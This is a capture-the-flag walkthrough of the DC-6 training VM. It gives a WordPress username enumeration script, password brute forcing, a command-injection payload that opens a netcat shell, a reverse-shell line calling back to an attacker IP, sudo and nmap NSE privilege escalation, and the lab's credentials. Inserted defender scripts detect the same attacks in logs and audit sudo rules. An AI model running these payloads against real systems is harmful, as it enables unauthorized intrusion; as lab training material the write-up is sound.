DC-6 machine penetration test
1. Penetration process
Preface:
Extracted from the VM description:
NOTE: You WILL need to edit your hosts file on your pentesting device so that it reads something like:
192.168.0.142 wordy
NOTE: I've used 192.168.0.142 as an example. You'll need to use your normal method to determine the IP address of the VM, and adapt accordingly.
Clue
OK, this isn't really a clue as such, but more of some "we don't want to spend five years waiting for a certain process to finish" kind of advice for those who just want to get on with the job.
cat /usr/share/wordlists/rockyou.txt | grep k01 > passwords.txt
That should save you a few years. ;-)
So we need to configure the hosts file.
First find the IP address of the VM:
netdiscover -r 192.168.0.1/24
The IP address found is:
192.168.0.141
Configure the hosts file:
echo '192.168.0.141 wordy' >> /etc/hosts
Once that is set, ping the hostname to check it...
Scan the ports with nmap:
nmap -sS -A -p- 192.168.0.141
Scan results:
Starting Nmap 7.70 ( https://nmap.org ) at 2020-04-26 19:51 CST
Nmap scan report for wordy (192.168.0.141)
Host is up (0.00028s latency).
Not shown: 65533 closed ports
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 7.4p1 Debian 10+deb9u6 (protocol 2.0)
| ssh-hostkey:
| 2048 3e:52:ce:ce:01:b6:94:eb:7b:03:7d:be:08:7f:5f:fd (RSA)
| 256 3c:83:65:71:dd:73:d7:23:f8:83:0d:e3:46:bc:b5:6f (ECDSA)
|_ 256 41:89:9e:85:ae:30:5b:e0:8f:a4:68:71:06:b4:15:ee (ED25519)
80/tcp open http Apache httpd 2.4.25 ((Debian))
|_http-generator: WordPress 5.1.1
|_http-server-header: Apache/2.4.25 (Debian)
|_http-title: Wordy – Just another WordPress site
MAC Address: 00:0C:29:B9:86:10 (VMware)
Device type: general purpose
Running: Linux 3.X|4.X
OS CPE: cpe:/o:linux:linux_kernel:3 cpe:/o:linux:linux_kernel:4
OS details: Linux 3.2 - 4.9
Network Distance: 1 hop
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
TRACEROUTE
HOP RTT ADDRESS
1 0.28 ms wordy (192.168.0.141)
Web and SSH are open.
Let's look at the web server first.
Wappalyzer shows the site is built on WordPress. That framework is easy to deal with; I've done it before, and the default admin login URL is http://wordy/wp-login.php
Here is a Python script dedicated to enumerating WordPress usernames:
#!/usr/bin/env python3
# encoding: utf-8
# Enumerate WordPress usernames via ?author=N: WordPress redirects each id to
# its author archive, whose <body> class carries the login name.
import re
import sys

import requests

headers = {
    'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.122 Safari/537.36',
}

# The author archive page exposes the username in its body class
author_re = re.compile(r'<body class="archive author author-(.+?) author-')


def getAuthor(url):
    for i in range(1, 50):
        geturl = url + "?author={}".format(i)
        try:
            res = requests.get(geturl, headers=headers, verify=False, timeout=10).content
        except Exception as e:
            print(str(e))
            continue  # skip this id rather than reusing the previous response
        # Decode leniently so an odd byte does not abort the search
        matchs = author_re.findall(res.decode(errors='replace'))
        with open('auth.txt', 'a') as fp:
            for auth in matchs:
                print('\033[33m author: ' + auth + '\033[0m')
                fp.write(auth + '\n')
    print('\033[32m [+] The results are saved in auth.txt. \033[0m')


if __name__ == '__main__':
    if len(sys.argv) < 2:
        print('\033[31m [-] Please enter the URL to enumerate. \033[0m')
        print('\033[35m template: ./author.py http://www.wordpress.com. \033[0m')
        sys.exit(-1)
    getAuthor(sys.argv[1])
This gives us an auth.txt file to use as the username wordlist.
Then there is the clue mentioned above:
cat /usr/share/wordlists/rockyou.txt | grep k01 > passwords.txt
Running that gives us a password wordlist.
Brute-forcing the login with Burp Suite using the two lists yields a valid account:
user:mark
passwd:helpdesk01
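As an added defender-side example (my own code, not part of this write-up), the following Python checks Apache combined-format access logs for the two patterns just used against the site: sequential ?author=N probing and a burst of POSTs to wp-login.php. The log lines are constructed and the thresholds are assumptions.

```python
#!/usr/bin/env python3
"""Flag WordPress author enumeration (?author=N) and wp-login.php password
guessing in Apache combined-format access logs. Sample lines are constructed;
the thresholds are assumptions, tune them to the site's normal traffic."""
import re
from collections import defaultdict

LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<path>\S+) [^"]*" (?P<status>\d{3}) \S+')
AUTHOR_RE = re.compile(r'[?&]author=(\d+)')

def parse(line):
    """Return the fields of one log line as a dict, or None if it does not parse."""
    m = LOG_RE.match(line)
    return m.groupdict() if m else None

def detect(lines, author_threshold=5, login_threshold=10):
    """Return {client_ip: [finding, ...]} for clients exceeding either threshold."""
    author_ids = defaultdict(set)   # ip -> distinct author ids probed
    login_posts = defaultdict(int)  # ip -> number of POSTs to wp-login.php
    for line in lines:
        rec = parse(line)
        if rec is None:
            continue
        m = AUTHOR_RE.search(rec["path"])
        if m:
            author_ids[rec["ip"]].add(int(m.group(1)))
        if rec["method"] == "POST" and rec["path"].startswith("/wp-login.php"):
            login_posts[rec["ip"]] += 1
    findings = defaultdict(list)
    for ip, ids in author_ids.items():
        if len(ids) >= author_threshold:
            findings[ip].append(f"author enumeration: {len(ids)} distinct ids probed")
    for ip, n in login_posts.items():
        if n >= login_threshold:
            findings[ip].append(f"login brute force: {n} POSTs to wp-login.php")
    return dict(findings)

# Constructed sample log: one scanning client and one ordinary visitor
SAMPLE = [f'192.168.0.21 - - [26/Apr/2020:19:55:{i:02d} +0800] "GET /?author={i} HTTP/1.1" 301 0'
          for i in range(1, 8)]
SAMPLE += [f'192.168.0.21 - - [26/Apr/2020:19:56:{i:02d} +0800] "POST /wp-login.php HTTP/1.1" 200 5120'
           for i in range(12)]
SAMPLE.append('192.168.0.50 - - [26/Apr/2020:19:57:00 +0800] "GET /?author=1 HTTP/1.1" 301 0')

if __name__ == "__main__":
    for ip, hits in detect(SAMPLE).items():
        print(ip, *hits, sep="\n  ")
```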
After logging in to the admin panel, the account turns out to have almost no privileges; the only thing it can operate is a single plugin: Activity Monitor.
Let's find a way to get a shell. First check whether the plugin has known vulnerabilities:
searchsploit wordpress Activity
This finds several cross-site scripting issues and one command injection. I'll use the command injection:
WordPress Plugin Plainview Activity Monitor 20161228 - (Authenticated) Command Injection | exploits/php/webapps/45274.html
According to 45274.html, on the page http://wordy/wp-admin/admin.php?page=plainview_activity_monitor&tab=activity_tools the IP input box is vulnerable to command injection, but the box has a maximum length of 15, so intercept the request and modify the parameter instead.
Fill the parameter with:
0.0.0.0 | nc -lvp 6666 -e /bin/bash
Then connect from Kali with nc to get a shell:
nc 192.168.0.141 6666   # connect with nc
# Get an interactive shell
python -c 'import pty;pty.spawn("/bin/bash")'
Let's first see which users exist:
cat /etc/passwd
Four user-created accounts are found:
graham:x:1001:1001:Graham,,,:/home/graham:/bin/bash
mark:x:1002:1002:Mark,,,:/home/mark:/bin/bash
sarah:x:1003:1003:Sarah,,,:/home/sarah:/bin/bash
jens:x:1004:1004:Jens,,,:/home/jens:/bin/bash
Let's look in each user's home directory:
www-data@dc-6:/var/www/html/wp-admin$ ls -l /home/jens;ls -l /home/sarah;ls -l /home/mark;ls -l /home/graham
total 4
-rwxrwxr-x 1 jens devs 56 Apr 26 00:01 backups.sh
total 0
total 4
drwxr-xr-x 2 mark mark 4096 Apr 26 2019 stuff
total 0
# jens has a backups.sh file
# mark has a stuff directory
cd /home/mark/stuff;ls
things-to-do.txt
# There is a things-to-do.txt file
cat things-to-do.txt
Things to do:
- Restore full functionality for the hyperdrive (need to speak to Jens)
- Buy present for Sarah's farewell party
- Add new user: graham - GSo7isUM1D4 - done
- Apply for the OSCP course
- Buy new laptop for Sarah's replacement
This gives us graham's password, and port 22 is open, so let's try logging in over SSH.
We have already looked at graham's home directory; there is nothing in it.
Check the cron jobs:
crontab -l
>>>>>> nothing. Check the history:
history
>>>>>> nothing. Check sudo:
sudo -l
One entry is found:
User graham may run the following commands on dc-6:
(jens) NOPASSWD: /home/jens/backups.sh
So /home/jens/backups.sh can be run as jens without a password.
Its contents just tar up the website, so we overwrite it to spawn a reverse shell instead:
echo 'bash -i >& /dev/tcp/192.168.0.21/4444 0>&1' > /home/jens/backups.sh
Then run it:
sudo -u jens /home/jens/backups.sh
Check the cron jobs again:
crontab -l
>>>>>> nothing. Check the history:
history
>>>>>> nothing. Check sudo:
sudo -l
User jens may run the following commands on dc-6:
(root) NOPASSWD: /usr/bin/nmap
nmap can be run as root without a password, and nmap can execute NSE script files:
echo 'os.execute("/bin/bash")' > /tmp/nmap.nse
sudo nmap --script /tmp/nmap.nse
That gives us a root shell:
root@dc-6:/tmp# id
uid=0(root) gid=0(root) groups=0(root)
# Grab the flag directly
cat ~/$(cd ~;ls)
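As an added example from the defender's side (my own code, not from the write-up), the following Python audits sudo rules of the two kinds found above: a NOPASSWD target the caller can overwrite (backups.sh) and a NOPASSWD binary that can run arbitrary scripts (nmap). File ownership is supplied as constructed metadata rather than read with os.stat; graham's membership in devs and the gid of devs are assumptions.

```python
#!/usr/bin/env python3
"""Audit `sudo -l` NOPASSWD rules for the two weaknesses found on DC-6:
a target the calling user can overwrite (backups.sh, -rwxrwxr-x jens devs)
and a target that can execute scripts or a shell (nmap --script).
File metadata is constructed below instead of read with os.stat so the check
runs anywhere; the SHELL_CAPABLE list is an assumption, extend it as needed."""
import re
import stat

SHELL_CAPABLE = {"nmap", "vim", "less", "python", "perl", "find", "bash", "sh"}
RULE_RE = re.compile(r'^\s*\((?P<runas>[^)]+)\)\s+NOPASSWD:\s+(?P<cmd>\S+)')

def parse_rules(sudo_l_output):
    """Extract {runas, cmd} from the rule lines of `sudo -l` output."""
    return [m.groupdict() for m in map(RULE_RE.match, sudo_l_output.splitlines()) if m]

def writable_by(meta, uid, gids):
    """meta = (mode, owner_uid, owner_gid); owner bits win, then group, then other."""
    mode, owner, group = meta
    if owner == uid:
        return bool(mode & stat.S_IWUSR)
    if group in gids:
        return bool(mode & stat.S_IWGRP)
    return bool(mode & stat.S_IWOTH)

def audit(rules, files, uid, gids):
    """Return one finding per dangerous rule for a caller with this uid/gids."""
    findings = []
    for r in rules:
        cmd, runas = r["cmd"], r["runas"]
        if cmd.rsplit("/", 1)[-1] in SHELL_CAPABLE:
            findings.append(f"{cmd} as {runas}: binary can run scripts or spawn a shell")
        if cmd in files and writable_by(files[cmd], uid, gids):
            findings.append(f"{cmd} as {runas}: target writable by caller, make it root-owned 0755")
    return findings

# Constructed metadata mirroring the write-up: jens uid 1004, graham uid 1001, devs gid 1005 (assumed)
FILES = {
    "/home/jens/backups.sh": (0o100775, 1004, 1005),  # -rwxrwxr-x jens devs
    "/usr/bin/nmap": (0o100755, 0, 0),                # root-owned, not writable
}
GRAHAM_RULES = "User graham may run the following commands on dc-6:\n    (jens) NOPASSWD: /home/jens/backups.sh\n"
JENS_RULES = "User jens may run the following commands on dc-6:\n    (root) NOPASSWD: /usr/bin/nmap\n"

if __name__ == "__main__":
    print(audit(parse_rules(GRAHAM_RULES), FILES, 1001, {1001, 1005}))  # graham assumed in devs
    print(audit(parse_rules(JENS_RULES), FILES, 1004, {1004, 1005}))
```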
Actually the website config file also contains the database credentials... the passwords in there were too hard, I couldn't work them out.
I found the file that generates the passwords and saw that the result is different every time; I don't know how to crack it.
2. Key information:
#1. Website admin credentials:
user: mark
passwd: helpdesk01
#2. SSH credentials:
user: graham
passwd: GSo7isUM1D4
#3. Database credentials:
user: wpdbuser
passwd: meErKatZ
DBName: wordpressdb